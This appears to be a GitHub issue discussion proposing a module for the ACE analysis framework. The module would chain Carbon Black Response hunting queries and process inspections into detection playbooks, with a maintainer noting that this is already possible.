CbR Advanced Query Hunter

[seanmcfeely]

In some cases, it's desirable to perform some additional CbR process inspection on process or process tree events before firing a detection. It's also desirable to chain together queries and process inspections like a "playbook" and then only firing a detection if all conditions are met.

Example:
Base query/playbook starting point:

process_name:iexplore.exe cmdline:.mht* childproc_name:iexplore.exe

All results from that query would be sent to ACE for analysis (analysis mode) and this CbR Advanced Query Hunter would pick up that analysis.
For this example, the child process of each process result would be inspected to see if an XML file was written. If so, then that would be the detection for this specific example and the ACE analysis would become an Alert and enter correlation mode.

Some things to note:
We will not want this module to work on every process guid observable, so some method should be used for signaling ACE to use this CbR Advanced Query Hunter module. Also, it makes no sense for every "playbook" script to be run against incoming results. For this reason, ACE should manage the "playbooks" from start to finish, aka handle the CbR queries itself through cbinterface. I'm thinking that the playbooks are defined in config files and maintained outside of the ACE project itself as they would be considered intel.

[seanmcfeely]

Additional ideas:

Can apply directionality to filemods that will allows detection based on wrote/deleted.

Can detect service installations by looking to see if a file was recently written and then launched by services.exe a shot time later. Then, can correlate back to the source that wrote the exe.

[unixfreak0037]

As privately discussed, this is already possible by submitting analysis requests with analysis mode set to "analysis", and then adding a detection point in your new module if you find something.